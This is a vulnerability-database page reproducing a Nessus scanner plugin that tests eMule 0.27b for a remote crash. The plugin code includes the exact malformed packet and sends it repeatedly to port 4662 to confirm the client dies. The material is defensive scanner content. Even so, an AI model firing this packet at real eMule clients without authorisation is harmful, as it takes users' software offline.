Lucene search
K

eMule Malformed Data Handling Remote DoS

🗓️ 25 Mar 2003 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 15 Views

eMule P2P application vulnerable to denial of service via malformed data connections.

Refs
Code
#
# (C) Tenable Network Security, Inc.
#

# Ref:
#  Date: Tue, 25 Mar 2003 13:03:13 +0000
#  From: Auriemma Luigi <[email protected]>
#  To: [email protected]
#  Subject: Emule 0.27b remote crash


include("compat.inc");

if(description)
{
 script_id(11473);
 script_version ("1.19");
 script_bugtraq_id(7189);

 script_name(english:"eMule Malformed Data Handling Remote DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote P2P application is prone to a denial of service attack." );
 script_set_attribute(attribute:"description", value:
"It was possible to disable the remote eMule client by connecting to
this port and sending malformed data." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/316185" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to version 0.27c of eMule." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");


 script_set_attribute(attribute:"plugin_publication_date", value: "2003/03/25");
 script_set_attribute(attribute:"vuln_publication_date", value: "2003/03/25");
 script_cvs_date("Date: 2018/11/15 20:50:24");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english: "Crashes the remote eMule client");
 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
 script_family(english:"Peer-To-Peer File Sharing");
 script_require_ports(4662);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");

port=4662;

if(! get_port_state(port)) exit(0, "TCP port "+port+" is closed.");
soc = open_sock_tcp(port);
if(! soc) exit(1, "Cannot connect to TCP port "+port+".");

   pkt = raw_string(
   0xE3, 0x24, 0x00, 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
   0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0xE3, 0x03, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x00);

  send(socket:soc, data:pkt);
  close(soc);
  
for(i = 0; i < 3; i ++)
{
 for (j = 1; j < 4; j ++)
 {
  soc = open_sock_tcp(port);
  if (soc) break;
  sleep(j);
 }
 if(! soc)
 {
   if (service_is_dead(port: port, exit: 1) > 0)
     security_warning(port);
   exit(0);
 }
 send(socket:soc, data:pkt);
 close(soc);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Nov 2018 20:50Current
5.5Medium risk
Vulners AI Score5.5
15